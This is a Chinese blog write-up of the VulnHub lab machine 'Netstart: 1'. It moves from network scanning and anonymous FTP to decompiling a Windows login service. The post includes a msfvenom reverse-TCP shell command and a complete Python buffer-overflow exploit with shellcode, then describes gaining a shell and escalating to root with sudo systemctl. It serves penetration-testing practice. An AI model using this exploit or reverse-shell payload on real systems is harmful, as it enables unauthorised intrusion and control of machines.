vulnhub靶机-Netstart: 1

最新推荐文章于 2024-01-31 10:45:53 发布
最新推荐文章于 2024-01-31 10:45:53 发布
阅读量252 收藏
点赞数 1
分类专栏: 靶机 文章标签: linux 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_48985780/article/details/118221034
版权

vulnhub靶机-Netstart: 1

arp-scan -l 扫描靶机IP地址

nmap -sV -Pn -A x.x.x.250 扫描端口

ftp 匿名登陆,发现一个exe文件和一个dll动态链接库,这不有点像我上一篇后半部分的pwn嘛,下载下来

先猜测一波前面的2371端口应该就是login.exe运行的端口,运行结果一样,证明猜想,接下来就是找到pwn的地方

将文件拖到ida中分析,同样的找到输出password的地方,f3函数里面也有一个strcpy函数,前面对输入的字符也有一些限制

int __stdcall ConnectionHandler(LPVOID lpThreadParameter)
{
  int result; // eax
  size_t v2; // eax
  char Dst; // [esp+18h] [ebp-410h]
  char *Dest; // [esp+400h] [ebp-28h]
  int v5; // [esp+404h] [ebp-24h]
  int v6; // [esp+408h] [ebp-20h]
  SOCKET s; // [esp+40Ch] [ebp-1Ch]
  void *v8; // [esp+410h] [ebp-18h]
  char *buf; // [esp+414h] [ebp-14h]
  int len; // [esp+418h] [ebp-10h]
  unsigned int i; // [esp+41Ch] [ebp-Ch]
 
  len = 4096;
  buf = (char *)malloc(0x1000u);
  v8 = malloc(0x400u);
  memset(&Dst, 0, 0x3E8u);
  memset(buf, 0, 0x1000u);
  s = (SOCKET)lpThreadParameter;
  result = send((SOCKET)lpThreadParameter, "Password:\n", 11, 0);
  v6 = result;
  if ( result == -1 )
  {
    closesocket(s);
    result = 1;
  }
  else
  {
    while ( lpThreadParameter )
    {
      result = recv(s, buf, len, 0);
      v5 = result;
      if ( result > 0 )
      {
        Dest = (char *)malloc(0xB54u);
        memset(Dest, 0, 0xB54u);
        strncpy(Dest, buf, 0xB54u);
        for ( i = 0; ; ++i )
        {
          v2 = strlen(Dest);
          if ( v2 <= i )
            break;
          if ( Dest[i] == 45 )
          {
            Dest[i + 1] = 0;
            Dest[i] = -80;
          }
          if ( Dest[i] == 46 )
          {
            Dest[i + 1] = 0;
            Dest[i] = -80;
          }
          if ( Dest[i] == 70 )
          {
            Dest[i + 1] = 0;
            Dest[i] = -80;
          }
          if ( Dest[i] == 71 )
          {
            Dest[i + 1] = 0;
            Dest[i] = -80;
          }
          if ( Dest[i] == 89 )
          {
            Dest[i + 1] = 0;
            Dest[i] = -80;
          }
          if ( Dest[i] == 94 )
          {
            Dest[i + 1] = 0;
            Dest[i] = -80;
          }
          if ( Dest[i] == 96 )
          {
            Dest[i + 1] = 0;
            Dest[i] = -80;
          }
        }
        f3(Dest);
        memset(Dest, 0, 0xB54u);
        closesocket(s);
        return 0;
      }
      if ( v6 == -1 )
      {
        closesocket(s);
        return 1;
      }
    }
  }
  return result;
}
f3函数,距离返回地址1702(0x6A2+4)个字节

char *__cdecl f3(char *Source)
{
  char Dest; // [esp+16h] [ebp-6A2h]
 
  return strcpy(&Dest, Source);
}
 

使用msf生成shellcode

msfvenom -p linux/x86/shell_reverse_tcp LHOST=x.x.x.250 LPORT=4444 -b '\x00\x0a\x2d\x2e\x46\x47\x59\x5e\x60' -f python

最终代码

#!/usr/bin/python3
import socket
buf=b''
target_ip='192.168.75.21'
target_port=2371
recv_buf=4096
junk = b'a' * 1702
ret_addr=b'\xb8\x12\x50\x62'
nops=b'\x90'*32  #必需
buf =  b""
buf += b"\x33\xc9\xb1\x11\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73"
buf += b"\x13\x55\x91\xe7\x4e\x83\xeb\xfc\xe2\xf4\x64\x4a\x10"
buf += b"\xad\x06\xd2\xb4\x24\x57\x18\x06\xfe\x33\x5c\x67\xdd"
buf += b"\x0c\x21\xd8\x83\xd5\xd8\x9e\xb7\x3d\x51\x4f\x05\x58"
buf += b"\xf9\xe5\x4e\x51\x43\x6e\xaf\xe5\xf7\xb7\x1f\x06\x22"
buf += b"\xe4\xc7\xb4\x5c\x67\x1c\x3d\xff\xc8\x3d\x3d\xf9\xc8"
buf += b"\x61\x37\xf8\x6e\xad\x07\xc2\x6e\xaf\xe5\x9a\x2a\xce"
 
    
payload = b''
payload += junk
payload += ret_addr
payload += nops
payload += buf
with socket.socket(socket.AF_INET,socket.SOCK_STREAM) as clientSock:
    clientSock.connect((target_ip,target_port))
    data_from_srv = clientSock.recv(recv_buf)
    print(f"Reply --> {data_from_srv}")
    print(f"Sending --> {payload}")
    clientSock.sendall(payload)

buf替换你的,攻击机创建py文件,并运行

本地监听,成功反弹shell,python提权到tty,得到第一个flag

进入交互模式

查看local.txt文件

使用sudo -l命令发现可以免密使用root身份执行systemctl命令,使用systemctl提权成功,拿到最终flag

获得root权限

查看root目录下的文件

xzhome
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vulnhub靶机实战--FunBox3:EASY
m0_64312309的博客
09-21 630
Vulnhub介绍: Vulnhub 是一个漏洞靶场平台,里面含有大量的靶场镜像,只需要下载虚拟机镜像,导入 VMWare 或者 VirtualBox 即可启动靶场,同时它还提供了 Docker 镜像,可以使用 Docker 直接启动靶场,大大简化了渗透测试人员在搭建各种漏洞靶场时的步骤
vulnhub靶机实战--FunBox:1
m0_64312309的博客
09-21 501
Vulnhub介绍: Vulnhub 是一个漏洞靶场平台,里面含有大量的靶场镜像,只需要下载虚拟机镜像,导入 VMWare 或者 VirtualBox 即可启动靶场,同时它还提供了 Docker 镜像,可以使用 Docker 直接启动靶场,大大简化了渗透测试人员在搭建各种漏洞靶场时的步骤
netstat -nao
crazy java
06-14 325
1.netstat -nao 2.windows任务管理器选择pid 3.windows任务管理器查找相关的进程close掉
vulhub | vulhub安装教程,有这一篇就够了~(详细图解)
最新发布
鱼溯的博客
01-31 4123
vulhub | vulhub安装教程,有这一篇就够了,包含Centos和kali的安装,以及docker与docke-compose的详细命令(详细图解)
Vulnhub靶机检测不到IP地址
asstart的博客
12-07 6456
vulnhub靶机无法获取IP地址 0x00前言 小编从vulnhub官网下载靶机,准备做学习测试时,使用kali无法检测到靶机的IP,arp-scan、nmap存活主机探测、netdiscover均未检测到靶机的IP地址,因为我们无法获取靶机的IP地址的话就没办法进行下一步。 0x01排查 确保kali与vulnhub靶机同处在一个网络环境。经过确认kali虚拟机和vulnhub靶机均同处在VM...
开启服务的命令-Net start命令详解
热门推荐
haiross的专栏
10-22 5万+
开启服务的命令-Net start命令详解  开启服务窗口的命令:开始-运行-cmd-services.msc 本文主要讲开启服务的命令: net start [服务名] -枚举开启的服务(无参数时) 如net start telnet 就启动了telnet服务 net stop [服务名] 可关服务,控制面板的管理工具的服务是一个图形化管理服务的工具。 另外一个启动服务的命令
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
VulnHub靶机-Jangow: 1.0.1
weixin_46694260的博客
09-15 2686
迟到的文章,就当库存发出来吧~
Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)
01-09
这次的靶机Vulnhub靶机:Kioptrix: Level 1.2 (#3) 文章目录靶机地址及相关描述靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址及相关描述 https://www.vulnhub.com/entry/kioptrix-level-12-3,24/ ...
使用Windows命令行启动关闭服务(net start)
len的博客
03-18 1万+
net用于打开没有被禁用的服务, NET命令是功能强大的以命令行方式执行的工具。 启动和关闭服务的时候,其语法是: net start 服务名 net stop 服务名   比如我启动我的prepositive server 服务,命令行中输入net start prepositive 即可,可以更进一步将你经常需要启动的服务整理成命令,用记事本保存成cmd后缀格式的文件,这样...
看完这篇 教你玩转渗透测试靶机vulnhub——EvilBox-One
Aluxian_的博客
07-15 5578
Vulnhub靶机Web1渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 老样子需要找到flag即可。 Vulnhub靶机下载: 官网地址:https://download.vulnhub.com/evilbox/EvilBox—One.ova
windows命令
ggaofengg的专栏
03-17 310
net start  --列出所有已经启动的服务 net start [服务名称] net stop [服务名称] net use  把远程主机的某个共享资源映射为本地盘符以方便使用 net use Z: \\192.168.10.210\nero 创建服务(本质是在注册表中添加信息)和查询服务信息 sc create Serv-U binpath= "F:\ServU
网络资源共享 、 共享权限控制
m0_46196876的博客
03-22 617
回顾 winPE工具箱 密码破解 磁盘管理 系统安装、系统备份、系统还原 数据恢复 NTPWDIT工具(密码的破解,系统分区:\Windows\System32\config\SAM) 磁盘管理,傲梅分区助手(创建分区、格式化分区、释放分区、合并分区) U深度PE装机工具(系统备份、还原、安装) Recuva(数据恢复工具,文件删除并清空回收站,偿试此工具恢复数据) winPE工具盘制作注意事项 U盘数据的备份 进行winPE工具盘制作前建议取消赞助软件 先将普通用户加入admini
net start命令的使用
wangzhi_821的专栏
11-04 8485
在命令提示符下,怎么查看windows开启了哪些服务net start 就是了~~ <br /><br /><br /> 一、 <br /> net use //ip/ipc$ " " /user:" " 建立IPC空链接 <br /> net use //ip/ipc$ "密码" /user:"用户名" 建立IPC非空链接 <br /> net use h: //ip/c$ "密码" /user:"用户名" 直接登陆后映射对方C:到本地为H: <br /> net use h: //ip/c$
windows下用cmd命令netstat查看系统端口使用情况
weixin_30361641的博客
08-22 1557
http://zhidao.baidu.com/question/93620213.html http://xiaoxinshome.iteye.com/blog/811078 http://www.iteye.com/topic/1117270 开始--运行--cmd 进入命令提示符 输入netstat -ano 即可看到所有连接的PID 之后在任务管理器中找到这个PID所对应的程序...
CyberSploit:1
小小猪的博客
10-28 1597
上传linpeas.sh进行漏洞发现,linpeas.sh自行在github上面下载。登录ssh,密码是flag1,查看到flag2。nmap扫描服务以及端口,发现80和22。扫描目录,发现robots.txt文件。进行解密,得到flag2。进行base64解密。得到第三个flag3。
Insanity:1靶机
小小猪的博客
09-29 1355
发现目录下面存在一个火狐的密码缓存文件,将他下载到本地,并下载工具进行破解。发现电子邮件里面会显示,电子邮件系统账号密码一样。登录增加服务器的系统,密码123456。arp-scan探测靶机IP地址。切换到root用户,发现flag。查看mysql.user密码。访问news目录发现用户名。nmap探测端口和服务。增加一台不可用的服务器。直接注入语句,查看数据。
Vulnhub靶机实战——Matrix2
小小猪的博客
06-04 1078
Vulnhub靶机实战——Matrix2 arp-scan -l,检测靶机ip地址 nmap -A -T4 -p- x.x.x.224 分别打开相关端口查看页面 在12322端口下,发现一个file_view.php文件,但在robots.txt文件发现禁用了file_view.php文件,怀疑存在任意文件包含漏洞 https://x.x.x.224:12322/robots.txt https://x.x.x.224:12322/file_view.php post请求fil
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。对于想要提高渗透测试技能的安全从业者来说,这是一个非常有用的学习资源。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值